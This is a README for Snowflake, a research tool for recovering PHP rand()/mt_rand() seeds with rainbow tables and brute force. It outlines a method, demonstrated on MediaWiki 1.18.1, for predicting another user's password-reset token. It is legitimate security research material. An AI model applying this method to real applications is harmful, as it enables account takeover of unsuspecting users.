benhunter/Snowflake

*****--------------------------=== Snowflake ===--------------------------*****
-----*****-------------------------^^^^^^^^^-------------------------*****-----


SUMMARY
-------
Snowflakes are considered unique. A common saying asserts that no two are 
identical. However, under specific circumstances and environments their shapes 
tend to be predictable. For example, the shape of the snowflake is determined 
broadly by the temperature and humidity at which it is formed.

Snowflake is a framework to assist the exploitation of randomness 
vulnerabilities in PHP applications and in particular, it helps with the 
implementation of seed recovery attacks. 
For more information on these attacks check the paper
"I Forgot Your Password: Randomness Attacks Against PHP Applications"

This release includes the standalone version of the snowflake cracking tool
along with its python interface and in addition, a sample password reset 
exploit against mediawiki 1.18.1 in order to demonstrate the process of 
writing such exploits, and a stripped version of the mt_rand() function from
the PHP sources. 



INSTALLATION
------------
Installation of snowflake is pretty straightforward. Just run the make command
on the top directory and all binaries and libraries will be compiled along
with the necessary library for the mediawiki sample exploit that is included.

The snowflake executable and library will be installed at the release directory
while the hash library for the mediawiki exploit will be installed in the 
exploits directory.

Snowflake does not have any weird dependencies therefore it should compile 
successfully in any unix system.


Using snowflake
---------------
For those familiar with hash cracking tools, snowflake follows an architecture
which is similar with that of the rainbowcrack tool.

The user creates a user defined hash function (which is application dependent)
and then compiles that hash function as a shared library, taking care to 
export the necessary information (see below). The function should take as
input a 32 bit integer (the seed) and return an arbitrary output 
(defined as char *).

Note that we use the term hash function in a liberal sense  as it is not 
necessary to have reduction of input length or any other property typically
associated with such functions (e.g., collision resistance).

Afterwards, snowflake can do the following using this hash function:
1. Generate rainbow tables for all 2^32 possible seeds.
2. Search some given rainbow tables for a target hash.
3. Perform an online bruteforcing on all 2^32 seeds to find a target hash.

In addition, using the python interface a user can perform the actions 2,3 
from a python script which makes it much easier to use from within a python 
exploit.

**** Defining a hash function ****

In order to define a new hash function one should write the hash function and
then define a hashFuncEntry array named hashFuncArray that will contain the 
information that snowflake needs regarding the hash function:

struct hashFuncEntry is the following:

typedef struct {
  char *hashName;
  char *(*hashFunc)(unsigned int, char *);
  unsigned int hashLen;
} hashFuncEntry;


where hashName is the name of the hash function that will be passed to snowflake
hashFunc is a pointer to the function and hashLen is the length of the hashes
that this function produces. 

Here is an example from the mediawiki hash function:
hashFuncEntry hashFuncArray[] = { // this symbol will be exported.
  {"wikihash",     mediawikiHash,    16},
  {0,         0,      0},        // terminated by a zero entry.
};

The array should be always terminated by a all zero entry, however one can
have more than one hash function in each library.

The hash function should look like this:

char *mediawikiHash(unsigned int seed, char hash[])

The third argument must be an array large enough to hold the hash and the 
function should also return a pointer to that array.

Afterwards, the code should be compiled as a shared library that will lie in 
the same directory as snowflake. The name of the library file should be 
hashlibN.so where N is the number of the library and can be from 0 to 10, 
ex. hashlib0.so.

When writing hash functions that use the mt_rand generator one can use the 
strip version that is included in the mt_rand directory. This version is a 
standalone implementation of the mt_rand function stripped from the PHP code.
Depending on the hash function defined one may be able to do some additional 
optimizations in order to improve performance (ex. see the mediawiki hash 
function at hashlibs/mwikihash.c).

For hash functions that use the rand() function you may use the standard libc
implementation. Note that attacking rand() on windows is trivial since the
state of the LCG of rand() is 15 bits which makes it very easy to attack even
with direct bruteforce over the network.


Now we are ready to use the hash function with snowflake.

**** Generating rainbow tables ****

In order to generate a number of rainbow tables we can use the standalone 
snowflake tool. But first we need to calculate the success probability of our 
tables; ideally we would like our tables to have 100% success probability. For 
this purpose we can use the prob.py script that will calculate the success 
probability given the parameters for each table and the total number of tables.


To generate one rainbow table with 10000000 entries and chain length 1000 we 
issue the following command:

snowflake generate 10000000 1000 1 myhashfunction

check the usage menu of snowflake for a detailed explanation for the command.

Notice that because our search space is only 2^32 we do not have any particular
problem in having a success probability of almost one while keeping the tables 
moderately small and the chains short. Some parameters follow:

   Chain Number | Chain length | no. of tables | Success Probality 
   
       10m           1000             3             0.990317
       10m           3000             3             0.999879
       5m            3000             3             0.997676
       
Notice also that each chain entry is 64 bit so we can create a 10m entries
table with around 80mb of space.


**** Searching for rainbow tables ****

In order to search a rainbow table for a target hash we issue the following 
command:

snowflake search rainbow_table_path target_hash

The hash should be in hexadecimal human readable form. snowflake will convert 
it to its raw byte form. An important note is that all the information for the 
rainbow table is included in the filename should the filename should stay 
intact, otherwise you will experience a number of funny stuff ranging from 
errors to stack overflows.

**** Cracking the hash online ****

If no tables are available or the hash was not found in these tables we can 
perform an exhaustive search over all 2^32 possible seeds. To do so we issue
the command:

snowflake crack hash_func_name target_hash

The cracker is multithreaded and will use a number of threads that is equal to
the number of CPU cores in the system in order to optimize performance. With
a 2.3 GHz quadcore processor we were able to search all search space for the
mediawiki hash function in about 20 minutes.



**** Using the python interface ****

Snowflake also includes a python module in order to use the search and crack 
functionalities from a python script. The module uses ctypes to access the 
function from within python.

In addition, the module also includes a pure python implementation of the 
mt_rand function as used by PHP. The mediawiki exploit is a nice showcase on 
how to use both of these classes (check exploits/mediawiki.py).

Initially import the classes

from snowflake import MtRand, Snowflake


There are 3 functions from the Snowflake class that one can use:

-- __init__( clib = './snowflake.so' )
The class takes as an optional initialization argument the full path for 
the snowflake shared library, otherwise it will search in the current
directory for snowflake.so.

-- searchRainbowTables( targetHash, tableList )
This function will take as input a targetHash (in raw byte form, you can use
the unhexlify function to convert that) and a list with rainbow tables and
will try to find the targetHash in each of these tables.

-- searchHashOnline( targetHash, hashFuncName )
Likewise this function takes a targetHash in raw byte form and the hash function
name and will perform an exhaustive search in order to find the correct seed
that generated the target hash.


-- oneWayOrAnother( targetHash, tableList, hashFuncName )
This function is simply a wrapper in order to call both of the above functions.
It will first search in the given rainbow tables and if the hash is not found 
it will perform an exhaustive search.


The MtRand class offers the following functions:

-- __init__ ( php = True ):
At initialization the user need to instruct the class if it should use
the php Mersenne Twister implementation or the original mersenne twister
implementation. There are some differences between the implementations
that are explained in the paper.

-- mtSrand( seed )
Seeds the generator with the given seed using the PHP seeding algorithm.

-- mtRand( min = None, max = None)
Generates a random number using the original Mersenne Twister algorithm with an
option to map the number to a smaller range using the PHP truncation algorithm.

-- phpMtRand( min = None, max = None )
Generates a random number using the PHP Mersenne Twister implementation, again
giving the option to map the number to a smaller range.


Writing exploits using snowflake
--------------------------------

Okay, now the interesting stuff. We now have everyting we need to mount seed
recovery attacks against PHP applications that use either rand() or mt_rand().

The first thing we need to do is to find a place within the application that 
an output of the target function is leaked to the user in any form (it could
be a CSRF token, a random password that is generated, a password reset token,
just grep around...)

Afterwards we write some C code that generates this leak when a newly seeded
generator is used. This code will serve as our hash function.

Then we generate some rainbow tables for this hash function and write an 
exploit that will force apache to spawn a new process and we obtain a sample
of our hash function which we then crack using snowflake to obtain the initial
seed. This will give us the initial seed that was used by the target 
application.

Now we can reset the target user's password within the same connection 
(remember: keep-alive is your friend!), and to predict the token that will
be generated.

To find the token we create a new instance of the MtRand class and seed it with
the seed we obtained. Afterwards we can simply apply the same algorithm to 
predict the generated token.

For a code tutorial which will better illustrate the process check the mediawiki
exploit.


LICENCE
-------

This software was written based on research funded by the ERC project CODAMODA
and is released under the New BSD License.

Acknowledgements
----------------

This research was partly supported by ERC project CODAMODA, #259152.

TODO / BUGS / ETC
-----------------

We think that the tool is quite usable by now. We will probably add multithreaded
search to the rainbow tables in order to improve the search time when complex
hash functions are used, although with any hash function we have used until now
the search time is under 1 minute.

wen addition, this is an ALPHA release. You will probably find a number of bugs
for which we would be grateful if you reported. However, please report bugs 
which occur only when the user is not acting maliciously. if someone get owned
because he opened a malicious rainbow table, so be it! Nevertheless, we will 
probably fix some of these bugs too (when we find some spare time...).

Finally, If anybody wants to contribute some code too, she is more than welcome 
to do so.

Happy exploitation!
benhunter / Snowflake

About

Languages